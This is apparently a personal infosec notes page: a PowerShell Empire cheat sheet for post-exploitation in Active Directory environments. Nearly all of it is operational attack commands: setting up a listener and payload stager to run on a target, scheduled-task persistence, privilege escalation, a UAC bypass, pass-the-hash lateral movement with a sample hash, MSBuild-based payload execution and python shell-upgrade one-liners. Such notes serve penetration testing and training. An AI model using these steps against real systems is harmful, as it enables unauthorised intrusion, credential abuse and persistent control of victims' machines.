akde/infosec

Information security is ultimately about managing risk

PowerShell Empire

, , , , ,
, , ,

Main­ly post exploita­tion for AD envi­ron­ments. (Down­load — also includ­ed in Kali sources)

Quick usage for privilege escalation

  1. Cre­ate a listener. 
    1. listeners
    2. uselistener http
    3. set Host $localIp
    4. set Port 8080
    1. execute
    2. back
  2. Cre­ate a payload. 
    1. usestager windows/launcher_bat (or _vbs, _xml, …)
    2. set Listener http
    3. execute
  3. Copy the cre­at­ed pay­load to the target.
  4. (Let) exe­cute it on the target.
  5. Rename the listener. 
    1. listeners
    2. interact $listenername
    3. rename $bettername
    4. back
  6. Start back­ground tak on the tar­get for persistance. 
    1. usemodule powershell/persistence/userland/schtasks
    2. set Agent $agentname
    3. set Listener http
    4. set IdleTime 3
    5. run
    6. back
  7. Now start to work… 
    1. Start with usemodule privesc/powerup/allchecks

General usage

Metas­ploit syn­tax / PSE syntax

  • use multi/handler / lis­ten­ers & uselis­ten­ers <TAB> & uselis­ten­ers http
  • run / execute
  • ses­sions / agents
  • use / usemodule
  • rename CWS… newname
  • ses­sions ‑i $id / inter­act $id
    • down­load
    • upload
    • mimikatz
    • shell­sys­in­fo
    • ps
    • migrate $pid / psin­ject $lis­ten­er $pid (ex. psin­ject http $pid)

Note: After use­mod­ule don’t for­get to go “back” and to “inter­act” with the agent to see job results!

Com­mands with an aster­ix require a high-integri­ty Empire Agent. To upgrade one which is cur­rent­ly an Admin­is­tra­tor, use powershell/privesc/bypassuac_fodhelper before run­ning a com­mand marked with an asterix.

Lateral movement

Use one of the mod­ules in powershell/lateral_movement.

(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName JEFF
(Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http
(Empire: powershell/lateral_movement/invoke_smbexec) > set Username nicky
(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash b40c7060e1bf68227131564a1bf33d48
(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain corp.com
(Empire: powershell/lateral_movement/invoke_smbexec) > execute

Switching to Metasploit

Cre­ate a meter­preter pay­load, upload it in Empire and exe­cute it with shell C:\…\payload.exe.

Oth­er way around: Cre­ate a lis­ten­er in Empire and upload it in a meter­preter session.

Upgrading a normal shell

  1. lis­ten­ers
  2. uselis­ten­er http
  3. set Host //$localIp
  4. exe­cute
  5. uses­tager windows/launcher_xml
  6. set Lis­ten­er http
  7. exe­cute
  8. Upload the gen­er­at­ed launcher.xml file to the victim
  9. Exe­cute it on the vic­tim as fol­lows: 
    C:\Windows\Microsoft.NET\Framework\v4.0.30319/MSBuild.exe launcher.xml

Persistence

If you are using the powershell/persistence/userland/schtasks mod­ule to archieve per­sis­tence, try to use the attribute Idle­Time. This cre­ates a new agent each n minutes.

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';